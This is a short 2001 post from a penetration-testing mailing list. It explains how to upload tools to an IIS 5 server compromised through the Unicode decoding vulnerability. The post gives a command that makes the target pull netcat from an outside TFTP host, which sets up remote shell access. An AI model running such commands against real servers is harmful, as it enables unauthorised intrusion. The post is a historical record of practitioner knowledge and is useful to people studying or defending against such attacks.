Penetration Testing mailing list archives

RE: pen testing iis 5

From: dilbert96 () hushmail com
Date: Sat, 23 Jun 2001 10:05:51 +0000 (PDT)

Hi,

In most cases I find the easiest way to upload files is tftp. There are
loads of tftp server programs however I recommend tftpd32 (attached). use
Unicode or escaped characters decoding vulnerability
http://www.sec-1.com/iisenc.zip and use

tftp.exe -i tftp.ip.addr GET nc.exe nc.exe

With iisenc.pl use

cmd /c> \\
Enter alternative command e.g. net.exe, tftp.exe >tftp.exe
tftp.exe>-i tftp.ip.addr GET nc.exe nc.exe

Regards

Gary O'leary-Steele